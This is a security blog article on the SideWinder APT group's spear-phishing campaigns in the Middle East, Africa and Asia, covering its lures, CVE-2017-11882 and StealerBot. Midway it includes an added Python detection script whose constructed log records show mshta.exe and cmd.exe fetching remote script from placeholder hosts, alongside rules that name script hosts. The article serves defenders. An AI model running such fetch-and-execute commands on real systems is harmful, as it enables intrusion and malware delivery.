
SideWinder APT Attacks Entities In Middle East And Africa

by Wajahat Raza

October 29, 2024 - TuxCare expert team

Recent reports have claimed that an advanced persistent threat (APT) group with ties to India has launched multiple attacks in the Middle East and Africa. The threat actor group, referred to as the SideWinder APT, has mainly targeted high-profile entities. In this article, we’ll dive into the attacks and uncover the exploited flaws. Let’s begin!

The SideWinder APT Attack Group Unveiled

Before diving into the details of the group, it’s worth mentioning that the SideWinder APT threat actor goes by multiple names, including APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04. Providing further insight into the threat actor, cybersecurity researchers from Kaspersky have stated that:

“The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.”

As per recent reports, the SideWinder APT has targeted various sectors in multiple countries.

Sectors:

  • Government
  • Military entities
  • Logistics infrastructure
  • Telecommunications companies
  • Financial institutions
  • Universities
  • Oil trading companies

Countries:

  • Bangladesh
  • Djibouti
  • Jordan
  • Malaysia
  • The Maldives
  • Myanmar
  • Nepal
  • Pakistan
  • Saudi Arabia
  • Sri Lanka
  • Turkey
  • U.A.E.

Apart from these targets, the threat actors have also been observed targeting diplomatic entities pertaining to Afghanistan, France, China, India, Indonesia, and Morocco.

Details Of The Attack Campaign

One of the key aspects of the SideWinder APT attack campaigns is their use of a multi-stage infection chain. This infection chain is designed to deliver a post-exploitation toolkit called StealerBot. Attacks orchestrated by the SideWinder APT group start with a spear-phishing email. The email carries one of the two payloads listed below.

  1. A ZIP archive with a Windows shortcut (LNK) file.
  2. A Microsoft Word document.

Either of these payloads can be used to execute JavaScript and .NET downloaders that deploy the StealerBot malware. The Word document relies on remote template injection and exploits CVE-2017-11882, while the LNK file uses the mshta.exe utility to run JavaScript code.
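As an added example that is not from the article or its sources, the following Python triages process-creation records for the two delivery chains just described: mshta.exe launched from a shortcut to fetch script, and Word handing off to the Equation Editor component (EQNEDT32.EXE) that CVE-2017-11882 targets. The log records, paths and rule names are constructed, and the example assumes a double-clicked shortcut shows explorer.exe as the parent process.

```python
"""Flag process-creation events matching the SideWinder delivery chains.
Added example; the records below are constructed, not real telemetry."""
import ntpath
import re

# Sysmon-style fields, simplified. Constructed sample events.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "https://example.invalid/update.hta"'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": '"EQNEDT32.EXE" -Embedding'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start https://example.invalid/stage2"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Script and command hosts a document should not normally launch.
SCRIPT_HOST = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# mshta.exe pulling a remote URL or a script file/protocol handler.
REMOTE_OR_SCRIPT = re.compile(r"https?://|\.hta\b|\.js\b|javascript:|vbscript:", re.I)


def _base(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the list of rule names an event matches (empty if nothing matched)."""
    hits = []
    parent, image, cmd = _base(event["parent"]), _base(event["image"]), event["cmdline"]
    # Rule 1: the LNK -> mshta.exe chain, where mshta fetches or runs script.
    if image == "mshta.exe" and REMOTE_OR_SCRIPT.search(cmd):
        hits.append("mshta_remote_script")
    # Rule 2: Word spawning the Equation Editor, the CVE-2017-11882 vector.
    if parent == "winword.exe" and image == "eqnedt32.exe":
        hits.append("word_equation_editor")
    # Rule 3: Word spawning a script/command host, a remote-template follow-on.
    if parent == "winword.exe" and image in SCRIPT_HOST:
        hits.append("word_spawns_script_host")
    return hits


def scan(events):
    """Return (index, rule names) for every event that matched at least one rule."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Running `scan(SAMPLE_EVENTS)` flags the first three constructed events and leaves the notepad launch alone; in production the rules would be tuned against baseline Office and shortcut activity before alerting.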

As of now, media reports have stated that the end goal of the SideWinder APT attacks is to support espionage by fetching plugins that can be used for various malicious activities, such as:

  • Installing additional malware.
  • Capturing screenshots.
  • Logging keystrokes.
  • Stealing passwords and files.
  • Intercepting RDP credentials.
  • Starting a reverse shell.
  • Phishing Windows credentials.
  • Escalating privileges.

Conclusion

The SideWinder APT group’s sophisticated multi-stage attacks highlight its evolving capabilities in espionage and cyber warfare. By targeting high-profile sectors and leveraging tools like StealerBot, the group poses a significant threat to global cybersecurity, requiring vigilant defenses and advanced countermeasures to mitigate its impact.

The sources for this piece include articles in The Hacker News and Kaspersky.
